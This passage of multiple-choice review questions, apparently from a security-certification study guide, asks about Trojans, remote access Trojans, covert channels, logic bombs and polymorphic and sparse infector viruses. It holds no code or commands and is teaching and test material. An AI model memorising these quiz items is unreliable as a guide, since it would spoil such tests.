    4. Port redirection

  12. A Trojan can include which of the following?

    1. RAT
    2. TCP
    3. Nmap
    4. Loki

  13. What is a covert channel?

    1. An obvious method of using a system
    2. A defined process in a system
    3. A backdoor
    4. A Trojan on a system

  14. An overt channel is __________.

    1. An obvious method of using a system
    2. A defined backdoor process in a system
    3. A backdoor
    4. A Trojan on a system

  15. A covert channel or backdoor may be detected using all of the following except __________.

    1. Nmap
    2. Sniffers
    3. An SDK
    4. Netcat

  16. A remote access Trojan would be used to do all of the following except __________.

    1. Steal information
    2. Remotely control a system
    3. Sniff traffic
    4. Attack another system

  17. A logic bomb has how many parts, typically?

    1. One
    2. Two
    3. Three
    4. Four

  18. A logic bomb is activated by which of the following?

    1. Time and date
    2. Vulnerability
    3. Actions
    4. Events

  19. A polymorphic virus __________.

    1. Evades detection through backdoors
    2. Evades detection through heuristics
    3. Evades detection through rewriting itself
    4. Evades detection through luck

  20. A sparse infector virus __________.

    1. Creates backdoors
    2. Infects data and executables
    3. Infects files selectively
    4. Rewrites itself